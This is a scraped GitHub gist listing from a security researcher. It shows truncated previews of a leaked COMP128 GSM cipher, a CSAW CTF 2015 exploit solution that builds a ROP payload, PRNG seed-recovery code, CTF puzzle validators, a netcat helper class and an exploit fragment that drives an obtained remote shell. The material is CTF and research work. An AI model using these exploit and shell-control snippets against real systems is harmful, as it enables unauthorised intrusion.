Skip to content

Instantly share code, notes, and snippets.

vanhoefm

Block or report user

Report or block vanhoefm

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@vanhoefm
vanhoefm / comp128.c
Created Feb 5, 2016
Leaked comp128 algorithm (version 2 and 3) and a refactored, easier to understand, version.
View comp128.c
/** Comp128 version 2 and 3 overview by Mathy Vanhoef (based on other contributions mentioned inline) */
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <time.h>
static uint8_t table0[] = {
197, 235, 60, 151, 98, 96, 3, 100, 248, 118, 42, 117, 172, 211, 181, 203,
@vanhoefm
vanhoefm / csaw-ctf-2015_exploit-500.py
Created Sep 21, 2015
Solution for exploiting 500 challenge of CSAW CTF 2015
View csaw-ctf-2015_exploit-500.py
#!/usr/bin/env python2
from pwn import *
# Stack layout of vulnerable functions:
#
# [ buffer of some length ][canary][align1][align2][saved-ebp][return-addr][arg0-buffer][arg4-count]
#
payload = pack(0x08048740) # send function -> send(socket, &password, 0x100, 0)
@vanhoefm
vanhoefm / findseed
Created Mar 23, 2015
Find PRNG seed
View findseed
#include <stdio.h>
#include <stdint.h>
int is_correct(uint32_t seed) {
uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
for (uint32_t i = 0, x = seed; i < 5; ++i) {
x = (214013 * x + 2531011) & 0xFFFFFF;
if (hexkey[i] != (x >> 16)) return 0;
}
return 1;
@vanhoefm
vanhoefm / findseed
Created Mar 23, 2015
Find PRNG seed
View findseed
#include <stdio.h>
#include <stdint.h>
int is_correct(uint32_t seed) {
uint8_t hexkey[] = "\xA4\x3D\xF6\xF3\x74";
for (uint32_t i = 0, x = seed; i < 5; ++i) {
x = (214013 * x + 2531011) & 0xFFFFFF;
printf("%X\n", x);
if (hexkey[i] != (x >> 16)) return 0;
}
View good_crypto
function validate() {
var x = document.forms["formxx"]["pwz"].value;
if (!x.match(/^[A-Za-z]+$/))
return false;
if (!sha1(x).match(/^ff7b948953ac/))
return false;
alert("Flag: " + x);
return true;
View good_crypto
function validate() {
var x = document.forms["formxx"]["pwz"].value;
alert(x);
if (x == null || x == "") {
alert("Password must be filled out");
return false;
}
if (!x.match(/^[A-Za-z]+$/)) {
alert("Bad charset");
View gist:5326833
# -------------- netcatlib.py -----------------------------------
import socket
class Netcat:
# TODO: ip and port should be optionaly, and an open() method should be added
# TODO: specify a timeout argument as well?
def __init__(self, ip, port):
self.buff = ""
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.connect((ip, port))
View gist:5326418
call 0x80486d0 <printf@plt>
movl $0x8049f3a,(%esp)
call 0x8048750 <puts@plt>
mov -0xc(%ebp),%eax
leave ; equivalent to movl %ebp, %esp
; popl %ebp
ret
View gist:5326382
; Dump of assembler code for function printf:
push %ebp ; save old frame pointer
mov %esp,%ebp
push %ebx
call 0xb7e8ba0f
add $0x10dd5b,%ebx
sub $0xc,%esp
lea 0xc(%ebp),%eax
mov %eax,0x8(%esp)
mov 0x8(%ebp),%eax
View gist:5305930
# Step 4 --- Test whether we've got our shell and let the magic happen
nc.write("echo \"GOT A SHELL\"\n")
nc.read_until("GOT A SHELL\n")
print "\nSUCCESS! We have a shell!\n"
while True:
command = raw_input("$ ")
nc.write(command + "\n")
# quick and dirty way to detect end of output
You can’t perform that action at this time.